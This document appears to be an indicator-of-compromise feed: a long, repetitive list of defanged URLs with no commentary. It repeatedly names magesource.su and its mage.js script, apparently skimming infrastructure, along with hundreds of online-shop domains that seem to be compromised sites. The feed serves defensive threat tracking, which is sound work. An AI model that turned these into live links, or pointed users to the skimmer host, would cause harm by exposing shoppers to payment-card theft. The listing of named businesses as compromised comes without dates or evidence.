      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: https://prawnman.]com.]au/
      URL: http://www.]officecorrect.]com/36-6.%5Dhtml
      URL: http://hotelcathedrale.]be/
      URL: https://medik8.]bg/
      URL: https://www.]denimvenim.]com/
      URL: http://flagandsymbol.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://www.]sportlowcost.]it/
      URL: https://www.]sunrisewholesaleinc.]com/
      URL: http://www.]fashionaxe.]com/
      URL: https://shop.]horoskoper.]net/
      URL: http://chappalwalla.]com/
      URL: https://gorusticx.]com/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://www.]tribalasia.]com.]my/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: http://yugen-studio.]com/
      URL: https://www.]prostraps.]com/
      URL: http://fetchscripts.]com/
      URL: http://de-lices.]ru/
      URL: http://www.]doreall.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: http://aquasport.]sigmacell.]in/
      URL: http://www.]americanlighter.]com/
      URL: http://oomph.]com.]sg/
      URL: https://magesource.]su/
      URL: http://pharmatrades.]com/
      URL: http://www.]onirico.]it/
      URL: http://luxuryjewelleryto.]com/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://montecitocaviar.]com/
      URL: http://fashionbagsshoes.]com/
      URL: http://www.]nuestranuevaweb.]com/
      URL: http://prolineglobal.]com/
      URL: http://trueitglobal.]com/
      URL: http://www.]opticaloutlet.]ca/
      URL: https://dload.]com.]br/
      URL: https://www.]xinginroo.]com/
      URL: http://fashionfromla.]com/
      URL: https://magesource.]su/
      URL: https://magesource.]su/mage.%5Djs
      URL: http://hotelcathedrale.]be/
      URL: http://www.]kalevalaproducts.]com/
      URL: http://www.]northhillco.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://oomph.]com.]sg/
      URL: http://fetchscripts.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]khadiindia.]in/
      URL: http://only16.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://montecitocaviar.]com/
      URL: http://rpkorea.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]eurocucina.]eu/
      URL: https://www.]arenaflorist.]com/
      URL: http://richbumlife.]com/
      URL: http://www.]hotsca.]com/
      URL: http://schrikdraad.]nu/
      URL: http://www.]i91cloud.]com/
      URL: https://magesource.]su/
      URL: https://krausjeans.]com/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: https://poolstore.]com.]au/
      URL: http://www.]happieproducts.]com/
      URL: http://english-furniture.]co.]uk/
      URL: http://www.]airckmoaw.]com/
      URL: http://www.]gpmbv.]com/
      URL: http://jacksvapes.]com/
      URL: https://www.]1by1shop.]com/
      URL: https://liquidlightglows.]com/bar-supplies-drink-ware/9-oz-light-up-led-disco-ball-rock-glass.%5Dhtml
      URL: http://www.]esde.]ro/
      URL: http://www.]colesinfrastructure.]com/
      URL: http://shop.]laboutiqueachapeaux.]com/
      URL: https://liquidlightglows.]com/bar-supplies-drink-ware/9-oz-light-up-led-disco-ball-rock-glass.%5Dhtml
      URL: http://hotelcathedrale.]be/
      URL: https://liquidlightglows.]com/bar-supplies-drink-ware/9-oz-light-up-led-disco-ball-rock-glass.%5Dhtml
      URL: http://www.]thevintagegrapes.]com/
      URL: http://www.]tribalasia.]com.]my/
      URL: http://www.]shopnsmiles.]com/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://shop.]laboutiqueachapeaux.]com/
      URL: http://flagandsymbol.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]oomph.]com.]sg/
      URL: http://rpkorea.]com/
      URL: http://chevyc10parts.]com/
      URL: https://www.]sellsspares.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]tec-heads.]com/
      URL: http://mstech.]com.]au/
      URL: https://falcontraders.]co.]uk/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/tmp/superpost.%5Dtxt
      URL: https://magesource.]su/domain/magesource
      URL: http://magesource.]su/app/lib/
      URL: http://magesource.]su/tmp/caesar/
      URL: http://magesource.]su/tmp/
      URL: http://magesource.]su/app/callbacks/
      URL: http://magesource.]su/app/routes/
      URL: http://magesource.]su/app/models/
      URL: http://magesource.]su/app/controllers/
      URL: http://magesource.]su/tmp/
      URL: http://magesource.]su/app/
      URL: http://homeautomation.]ph/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]theaugustco.]com/
      URL: https://commercialpoolandspasupplies.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]gardenarteu.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://momega.]vn/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: http://grupocyber.]net/
      URL: http://www.]fashionaxe.]com/
      URL: https://www.]wisesolutions.]net/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://prolineglobal.]com/
      URL: https://saritahanda.]com/
      URL: https://saritahanda.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]cancerexit.]com/
      URL: http://store.]shedbuster.]com/
      URL: https://www.]turismo.]pt/
      URL: http://aussiebloke.]com.]au/
      URL: https://saritahanda.]com/
      URL: http://ferlamsrl.]com/
      URL: http://www.]dwanka.]com/
      URL: http://philippelebac.]fr/
      URL: https://www.]peteshomekitchen.]com/
      URL: https://brooksleather.]com/
      URL: http://www.]onirico.]it/
      URL: http://www.]airsoftlegend.]com/
      URL: http://luggagemama.]com/
      URL: http://www.]wondershop.]in/
      URL: http://luxuryjewelleryto.]com/
      URL: http://uglynbeauty.]com/
      URL: https://davillblinds.]com/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: https://www.]athleticmmagear.]com/
      URL: https://www.]eyewear69.]my/
      URL: http://fashionfromla.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://www.]reynsaon.]com/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://www.]memorywholesalers.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://www.]plumbedright.]com/
      URL: https://www.]thepartshome.]se/
      URL: http://hotelcathedrale.]be/
      URL: http://devdantona.]com/
      URL: http://www.]matexbuyer.]com/
      URL: https://poolstore.]com.]au/
      URL: http://www.]ludoville.]it/
      URL: http://supersonicdeal.]com/
      URL: https://www.]taptye.]com/
      URL: http://www.]krirob.]nu/
      URL: http://www.]markitaly.]it/
      URL: http://www.]almosauto.]in/
      URL: http://www.]danatsouq.]com/
      URL: https://presse-web.]com/
      URL: http://www.]mentalgamesonline.]com/
      URL: http://lobbyclean.]com/
      URL: http://selectce.]co.]uk/
      URL: http://batubati.]hu/
      URL: http://deezcard.]fr/
      URL: http://www.]regalando.]eu/
      URL: http://kiiroousa.]com/
      URL: http://toppaint.]co.]th/
      URL: http://www.]schoenes-aus-nicki.]de/
      URL: http://www.]masaken.]com.]tr/
      URL: http://www.]virmans.]com/
      URL: http://schornsteinboerse.]com/
      URL: http://personalitytailors.]com/
      URL: https://www.]websun.]us/
      URL: http://www.]shopnsmiles.]com/
      URL: http://climatecsa.]com/
      URL: https://gyvunuparduotuve.]lt/
      URL: http://www.]colesinfrastructure.]com/
      URL: http://ecoselectnational.]co.]za/
      URL: https://falcontraders.]co.]uk/
      URL: http://www.]codiliam.]fr/
      URL: https://telefonedelongoalcance.]com.]br/
      URL: http://www.]tresorsdesoceans.]fr/home
      URL: http://lazieneczka.]pl/
      URL: http://net-istore.]ro/
      URL: http://www.]almosauto.]in/
      URL: http://www.]hotsca.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://labdooshoes.]com/
      URL: http://www.]airckmoaw.]com/
      URL: http://luxuryjewelleryto.]com/
      URL: http://www.]i91cloud.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://prawnman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mynumberplates.]com/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: https://www.]xinginroo.]com/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://www.]turyagatea.]com/
      URL: https://www.]d108.]ru/
      URL: https://www.]1by1shop.]com/
      URL: http://www.]almosauto.]in/
      URL: http://hotelcathedrale.]be/
      URL: https://krausjeans.]com/
      URL: https://krausjeans.]com/
      URL: https://magesource.]su/
      URL: http://motornets.]com/
      URL: https://www.]eyewear69.]my/
      URL: https://krausjeans.]com/
      URL: https://krausjeans.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ruotalibera.]biz/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]khadiindia.]in/
      URL: http://alch.]it/
      URL: http://english-furniture.]co.]uk/
      URL: http://dhyanaa.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]oomph.]com.]sg/
      URL: http://www.]webshopsmagento.]nl/
      URL: https://magesource.]su/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://www.]sellsspares.]com/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://momo33333.]fvds.]ru/
      URL: http://unsquashaball.]com/
      URL: http://www.]togotelecom.]ca/
      URL: https://www.]niwuma.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]athleticmmagear.]com/
      URL: http://wraps.]ru/
      URL: http://hotelcathedrale.]be/
      URL: http://fashionfromla.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://prawnman.]com.]au/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]togotelecom.]ca/
      URL: http://unsquashaball.]com/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: http://zuzugadgets.]com/
      URL: http://www.]xxlgrip.]com/
      URL: https://www.]xinginroo.]com/
      URL: http://worldstogether.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://vkconline.]com/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://vanquish.]co.]in/
      URL: http://usacontainergroup.]com/
      URL: http://ukrkniga.]com/
      URL: http://trueitglobal.]com/
      URL: http://www.]tourguidescalabria.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: https://www.]theaugustco.]com/
      URL: https://www.]techno-torch.]com/
      URL: https://www.]taptye.]com/
      URL: http://www.]supritam.]com/
      URL: https://www.]sunrisewholesaleinc.]com/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://stonemanasia.]com/
      URL: http://www.]sportlowcost.]it/
      URL: http://smallpenfactory.]com.]au/
      URL: http://shophorkeyswoodandparts.]com/
      URL: http://shop.]taketime.]ch/
      URL: http://shop-camera.]com/
      URL: http://www.]shieldmans.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://www.]schoenes-aus-nicki.]de/
      URL: http://sandoggrus.]dk/
      URL: http://www.]ruotalibera.]biz/
      URL: http://richbumlife.]com/
      URL: http://redcellmedical.]com/
      URL: http://purplebluepublishing.]com/
      URL: http://prolineglobal.]com/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://petanyway.]net/
      URL: http://www.]opticalsupplies.]com/
      URL: http://only16.]net/
      URL: http://www.]officiel.]it/
      URL: http://nowknow.]ch/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]nationaltiledistribution.]com/
      URL: https://myphonetics.]com/
      URL: https://my.]nutis.]com/
      URL: http://mstech.]com.]au/
      URL: http://montecitocaviar.]com/
      URL: http://megamojster.]si/
      URL: http://www.]mage-apps.]de/
      URL: http://www.]ludoville.]it/
      URL: http://www.]loosen-up.]com/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://kupu.]es/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://www.]katetsui.]com/
      URL: http://jewelsofdesert.]com/
      URL: http://www.]isbbookstore.]com/
      URL: http://infcollection.]com/
      URL: https://ibercorte.]com/
      URL: https://hyperstrength.]com/
      URL: http://www.]haitralled.]com/
      URL: http://grupocyber.]net/
      URL: https://gorusticx.]com/
      URL: http://goldwithyou.]com/
      URL: http://girlsandpearls.]com/
      URL: http://gemastrology.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://www.]fyringe.]com/
      URL: http://fetchscripts.]com/
      URL: http://fashionbagsshoes.]com/
      URL: http://www.]farmcraft.]at/
      URL: http://falcontraders.]co.]uk/
      URL: http://www.]esde.]ro/
      URL: http://www.]enotecaosteriaroma.]it/
      URL: http://www.]dysin.]com/
      URL: https://dourosoptika.]gr/
      URL: http://doctor-alcrimea.]ru/
      URL: http://diamondwrapfactory.]com/
      URL: http://devdantona.]com/
      URL: https://democanopy.]com/
      URL: http://dealelement.]com/
      URL: https://davillblinds.]com/
      URL: http://cyprusitstore.]com/
      URL: http://creekfire.]com/
      URL: http://www.]coslflybiod.]com/
      URL: https://www.]clinicallearning.]com/index.%5Dphp/
      URL: http://www.]clairnewt.]com/
      URL: https://www.]chirobuddy.]net/
      URL: http://chappalwalla.]com/
      URL: http://www.]ceilingfantastic.]com/
      URL: http://www.]bysicilia.]it/
      URL: http://buyvipbaby.]com/login/
      URL: http://www.]brushncanvas.]com/
      URL: http://bookmyo.]com/
      URL: https://blazingmemory.]com/
      URL: http://batubati.]hu/
      URL: https://www.]b2b.]voninostore.]com/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: https://www.]athleticmmagear.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]angcoshop.]com/
      URL: http://www.]almosauto.]in/
      URL: https://www.]alivemoto.]biz/
      URL: http://www.]4d-printology.]com/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/mage.%5Djs
      URL: https://magesource.]su/mage.%5Dj
      URL: https://magesource.]su/
      URL: https://magesource.]su/
      URL: http://shop-camera.]com/
      URL: https://magesource.]su/mage.%5Djs
      URL: http://www.]nanoderma.]de/
      URL: http://landv.]ru/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://shop-camera.]com/
      URL: http://magesource.]su/mage.%5Djs
      URL: http://magesource.]su/mage.%5Djs
      URL: https://dload.]com.]br/
      URL: http://diamondwrapfactory.]com/
      URL: http://www.]descontosemhoteis.]com.]br/
      URL: https://deals4kart.]com/
      URL: http://de-lices.]ru/
      URL: https://www.]d108.]ru/
      URL: http://cuberra.]eu/
      URL: http://www.]coslflybiod.]com/
      URL: http://classico.]nextmp.]net/
      URL: http://www.]clairnewt.]com/
      URL: http://chkmaid.]com/
      URL: http://chappalwalla.]com/
      URL: http://www.]chabadsoauction.]com/
      URL: http://www.]ceilingfantastic.]com/
      URL: http://www.]bysicilia.]it/
      URL: http://bymatty.]com/
      URL: http://buyvipbaby.]com/login/
      URL: http://www.]bukserhe.]com/
      URL: http://www.]brushncanvas.]com/
      URL: http://bookmyo.]com/
      URL: http://www.]blendystraw.]com/
      URL: http://www.]blazovic.]com/
      URL: https://blazingmemory.]com/
      URL: http://www.]benzin-im-blut.]com/
      URL: http://batubati.]hu/
      URL: https://goodprice.]net/customer/account/login
      URL: https://www.]b2b.]voninostore.]com/
      URL: https://www.]autowheelexperts.]com/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: http://asap.]co.]in/
      URL: http://aquasport.]sigmacell.]in/
      URL: http://www.]anjelskedarceky.]sk/
      URL: http://www.]dysin.]com/
      URL: http://asap.]co.]in/
      URL: http://www.]angcoshop.]com/
      URL: http://www.]americanlighter.]com/
      URL: https://www.]alivemoto.]biz/
      URL: http://advancehealthproducts.]com.]au/
      URL: http://www.]acolortree.]com/
      URL: http://www.]99materials.]com/
      URL: https://www.]905wood.]com/
      URL: http://zuzugadgets.]com/
      URL: http://www.]wondershop.]in/
      URL: https://weloveheipoa.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://vkconline.]com/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://vanquish.]co.]in/
      URL: http://usacontainergroup.]com/
      URL: http://ukrkniga.]com/
      URL: http://trueitglobal.]com/
      URL: http://www.]tourguidescalabria.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: http://www.]thevintagegrapes.]com/
      URL: http://thanhloc1.]com/
      URL: http://taketime-distribution.]com/
      URL: http://www.]superdin.]com.]br/
      URL: http://styleofparis.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://stonemanasia.]com/
      URL: http://start-finish.]ru/
      URL: http://stage.]citizencashmere.]com/
      URL: http://www.]spektramanagement.]com/
      URL: http://smallpenfactory.]com.]au/
      URL: http://shophorkeyswoodandparts.]com/
      URL: http://shop.]taketime.]ch/
      URL: http://shop-camera.]com/
      URL: http://selectce.]co.]uk/
      URL: https://saritahanda.]com/
      URL: http://www.]safetreksales.]com/
      URL: https://www.]richgromart.]com/
      URL: http://www.]reviewlista.]com/
      URL: http://www.]repkcory.]com/
      URL: https://www.]prostraps.]com/
      URL: https://prawnman.]com.]au/
      URL: http://plumbedright.]com/
      URL: http://piese-gm.]ro/
      URL: http://pharmatrades.]com/
      URL: http://petit-univers.]com/
      URL: http://petanyway.]net/index.%5Dphp/why-not-available/
      URL: http://www.]opticalsupplies.]com/
      URL: http://only16.]net/
      URL: http://www.]officiel.]it/
      URL: http://nowknow.]ch/
      URL: http://nordibalt.]lt/
      URL: https://www.]niwuma.]com/
      URL: http://www.]nationaltiledistribution.]com/
      URL: http://www.]nadiarey.]com/
      URL: http://mstech.]com.]au/
      URL: http://momega.]vn/
      URL: http://www.]minopuntomoda.]com/
      URL: http://mehtagems.]com/
      URL: http://www.]markitaly.]it/
      URL: https://magesource.]su/
      URL: http://www.]loosen-up.]com/
      URL: https://liquidlightglows.]com/
      URL: http://www.]lifestylea-list.]com/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://kupu.]es/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://www.]kitauto.]pt/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]katetsui.]com/
      URL: http://jewelsofdesert.]com/
      URL: http://www.]isbbookstore.]com/
      URL: http://infcollection.]com/
      URL: http://ibundo.]de/
      URL: http://www.]hoaquathanhhang.]com/
      URL: http://www.]hessiansantasacks.]co.]uk/
      URL: https://hanarovendas.]com.]br/
      URL: http://gravurator.]de/
      URL: https://goodprice.]net/customer/account/login
      URL: http://gemastrology.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://www.]fyringe.]com/
      URL: http://fetchscripts.]com/
      URL: http://fashionbagsshoes.]com/
      URL: http://www.]farmcraft.]at/
      URL: http://falcontraders.]co.]uk/
      URL: http://euromigracija.]lt/
      URL: http://ecoselectnational.]co.]za/
      URL: http://www.]dysin.]com/
      URL: https://dourosoptika.]gr/
      URL: http://doctor-alcrimea.]ru/
      URL: http://diamondwrapfactory.]com/
      URL: http://devdantona.]com/
      URL: https://democanopy.]com/
      URL: https://decor-boutique.]com/
      URL: http://de-lices.]ru/
      URL: http://www.]danatsouq.]com/
      URL: http://cuberra.]eu/
      URL: http://creekfire.]com/
      URL: http://coitoys.]com/
      URL: https://www.]clinicallearning.]com/index.%5Dphp/
      URL: http://www.]chabadsoauction.]com/
      URL: http://cadresrobain.]fr/
      URL: http://bookmyo.]com/
      URL: https://blazingmemory.]com/
      URL: http://www.]barcoderfidstore.]com/
      URL: https://www.]autowheelexperts.]com/
      URL: https://www.]athleticmmagear.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]americanlighter.]com/
      URL: https://www.]alivemoto.]biz/
      URL: https://www.]aioma.]it/index.%5Dphp/
      URL: https://afriliving.]com/
      URL: http://www.]acolortree.]com/
      URL: http://www.]99materials.]com/
      URL: https://5eboard.]com/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://www.]denimvenim.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/user/auth
      URL: http://www.]matexbuyer.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]shopforsaundarya.]com/
      URL: http://www.]mslzaric.]com/
      URL: http://www.]chabadsoauction.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://www.]mirnkola.]com/
      URL: http://www.]repkcory.]com/
      URL: http://richbumlife.]com/
      URL: https://www.]denimvenim.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://www.]kevinbuou.]com/
      URL: http://www.]tonyonlinestore.]com/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]supritam.]com/
      URL: https://www.]enlivenglobal.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://alphafxtestbooster.]com/
      URL: http://www.]doreall.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]dysin.]com/
      URL: http://www.]clairnewt.]com/
      URL: https://liquidlightglows.]com/
      URL: https://prawnman.]com.]au/
      URL: http://www.]ewrjuant.]com/
      URL: https://www.]denimvenim.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]repkcory.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://www.]airckmoaw.]com/
      URL: http://www.]danatsouq.]com/
      URL: https://www.]theaugustco.]com/
      URL: http://ukrkniga.]com/
      URL: http://www.]fashionaxe.]com/
      URL: http://www.]xxlgrip.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: http://www.]mirnkola.]com/
      URL: http://swimresearch.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]nadiarey.]com/
      URL: http://www.]mslzaric.]com/
      URL: http://www.]supritam.]com/
      URL: http://omniscrubs.]com/
      URL: http://www.]bowtiqueuk.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]dysin.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://chappalwalla.]com/
      URL: http://www.]chabadsoauction.]com/
      URL: https://gorusticx.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: http://www.]kevinbuou.]com/
      URL: http://www.]ewrjuant.]com/
      URL: http://www.]hotsca.]com/
      URL: http://antaraxnm.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]denimvenim.]com/
      URL: http://www.]repkcory.]com/
      URL: http://www.]coslflybiod.]com/
      URL: https://blazingmemory.]com/
      URL: http://alphafxtestbooster.]com/
      URL: http://www.]agrosystems.]gr/
      URL: http://www.]dutwsnmare.]com/
      URL: http://www.]mslzaric.]com/
      URL: http://www.]clairnewt.]com/
      URL: https://www.]d108.]ru/
      URL: http://www.]mslzaric.]com/
      URL: http://www.]agrosystems.]gr/
      URL: http://www.]clairnewt.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://chevyc10parts.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]tonyonlinestore.]com/
      URL: http://seasonallivingokc.]com/
      URL: https://www.]alivemoto.]biz/
      URL: http://www.]bowtiqueuk.]com/
      URL: http://www.]khadioutlet.]com/
      URL: http://www.]webshopsmagento.]nl/ajaxcart/index/options/product_id/1/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/mage.%5Djs
      URL: http://hotelcathedrale.]be/
      URL: https://www.]enlivenglobal.]com/
      URL: http://www.]dutwsnmare.]com/
      URL: http://fashionavenue.]ma/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]angcoshop.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mynumberplates.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://www.]mynumberplates.]com/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: https://decor-boutique.]com/
      URL: https://dload.]com.]br/
      URL: http://fisiolifepilates.]com.]br/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: http://www.]descontosemhoteis.]com.]br/
      URL: http://www.]tonyonlinestore.]com/
      URL: http://www.]superdin.]com.]br/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://batubati.]hu/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://www.]autocleaningbrunssum.]nl/
      URL: http://smallpenfactory.]com.]au/
      URL: http://www.]bukserhe.]com/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://masterlyweft.]com/
      URL: http://bookmyo.]com/
      URL: http://www.]farmcraft.]at/
      URL: http://www.]hoaquathanhhang.]com/
      URL: https://www.]niwuma.]com/
      URL: http://shopgbpi.]co.]uk/
      URL: http://www.]treosportswear.]com/
      URL: http://oculosdahora.]com.]br/
      URL: http://coitoys.]com/
      URL: http://www.]nadiarey.]com/
      URL: http://pharmatrades.]com/
      URL: http://doctor-alcrimea.]ru/
      URL: https://www.]solaroutdoorlightingdisplay.]com/
      URL: http://www.]mirnkola.]com/
      URL: https://www.]denimvenim.]com/
      URL: http://designbookshop.]in/
      URL: http://falcontraders.]co.]uk/
      URL: http://stonemanasia.]com/
      URL: http://www.]ewrjuant.]com/
      URL: http://motornets.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://dhyanaa.]com/
      URL: http://magescore.]com/
      URL: http://www.]officecorrect.]com/
      URL: https://www.]tec-heads.]com/
      URL: http://bagsymalone.]in/
      URL: http://philippelebac.]fr/
      URL: http://www.]fashionaxe.]com/
      URL: http://mehtagems.]com/
      URL: http://www.]qdp.]com/
      URL: https://www.]khadiindia.]in/
      URL: https://goodprice.]net/customer/account/login
      URL: http://www.]matexbuyer.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]khadiindia.]in/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://magesource.]su/
      URL: http://www.]minopuntomoda.]com/
      URL: http://fashionavenue.]ma/
      URL: http://www.]khadioutlet.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://gemastrology.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]airckmoaw.]com/
      URL: http://www.]kevinbuou.]com/
      URL: http://www.]fiskrose.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]matexbuyer.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://jacksvapes.]com/
      URL: http://garudakart.]com/
      URL: http://www.]bowtiqueuk.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]matexbuyer.]com/
      URL: https://goodprice.]net/customer/account/login
      URL: http://hotelcathedrale.]be/
      URL: https://www.]khadiindia.]in/
      URL: http://www.]qdp.]com/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://mehtagems.]com/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mynumberplates.]com/
      URL: http://www.]britoil.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]fashionaxe.]com/
      URL: http://philippelebac.]fr/
      URL: http://hotelcathedrale.]be/
      URL: http://bagsymalone.]in/
      URL: https://www.]tec-heads.]com/
      URL: http://www.]bowtiqueuk.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]officecorrect.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://magescore.]com/
      URL: http://dhyanaa.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://hotelcathedrale.]be/
      URL: http://motornets.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ewrjuant.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]repkcory.]com/
      URL: http://www.]supritam.]com/
      URL: http://www.]matexbuyer.]com/
      URL: http://www.]blazovic.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]kitauto.]pt/
      URL: http://hotelcathedrale.]be/
      URL: http://stonemanasia.]com/
      URL: http://stonemanasia.]com/
